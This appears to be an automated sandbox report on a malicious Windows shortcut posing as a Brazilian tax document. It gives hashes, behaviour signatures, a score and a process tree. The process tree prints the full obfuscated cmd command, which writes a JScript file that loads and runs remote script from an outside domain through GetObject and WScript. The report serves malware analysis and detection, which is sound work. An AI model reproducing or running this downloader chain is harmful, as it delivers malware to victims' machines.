Analysis

  • max time kernel
    187s
  • max time network
    192s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    06/12/2022, 11:09

General

  • Target

    RelatorioIRPF2022x_763.59941234.894541.08054.lnk

  • Size

    493B

  • MD5

    5d675c77ace428b2959c9579f4e3605c

  • SHA1

    b50d3aa98338a52c047a6cc0399046b8e65c8178

  • SHA256

    0d43d8d11bc22acb24fd9b02ed43fa2e40ba29f07272d278a33d412782435119

  • SHA512

    3ae5e8445781b77852fd6d6cdc07459e531865418a91f5a008dd0934ed160db26a4a39fb5c5ed725a9670cfe76ab34a2f61cf5a61278aeb49a7d4dd5c04c32a8

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\RelatorioIRPF2022x_763.59941234.894541.08054.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3196
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /V/D/c "md C:\ZUn9AOQ\&&s^eT SBFF=C:\ZUn9AOQ\^ZUn9AOQ&&S^Et NGOR=v2C7ar CDl3="sc"+"^r";DDl3="i^p"+"t^:2C7h";EDl3="T"+"t^P"+":";G2C7et^Ob^j2C7ec^t(CDl3+DDl3+EDl3+'&&s^ET E67=HTXCAHTXCAwaew.tnemllorne.cyouHTXCA?1HTXCA');&&s^Et/^p V8JJ="!NGOR:2C7=!!E67:HTXCA=/!"<n^ul > !SBFF!.^jS|ca^ll c^a^ll !SBFF!.jS"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3876
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" sEt/p V8JJ="var CDl3="sc"+"^r";DDl3="i^p"+"t^:h";EDl3="T"+"t^P"+":";GetObject(CDl3+DDl3+EDl3+'//waew.tnemllorne.cyou/?1/');" 0<nul 1>C:\ZUn9AOQ\ZUn9AOQ.jS"
        3⤵
        PID:2560
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" call call C:\ZUn9AOQ\ZUn9AOQ.jS "
          3⤵
          • Checks computer location settings
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:656
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\ZUn9AOQ\ZUn9AOQ.jS"
            4⤵
            • Blocklisted process makes network request
            PID:1728

    Network

    MITRE ATT&CK Enterprise v6

    Downloads

    • C:\ZUn9AOQ\ZUn9AOQ.jS

      Filesize

      107B

      MD5

      29cf655d6b28293d388268e308f7b554

      SHA1

      d43da5881b3968e81ba3e5e61f580c5f860302d9

      SHA256

      776fee39e41f81d10fa08c53fedf90716c97b5483d158c2fdbd5053a85e6d207

      SHA512

      eeabd784e408e4f62e35994e89acb5c94418548b4ba56b4ebaf2c15891a04aa587b32c1ac3449cbe58e5525d536890c0d17f754bf36ca00725461b9068d9d0df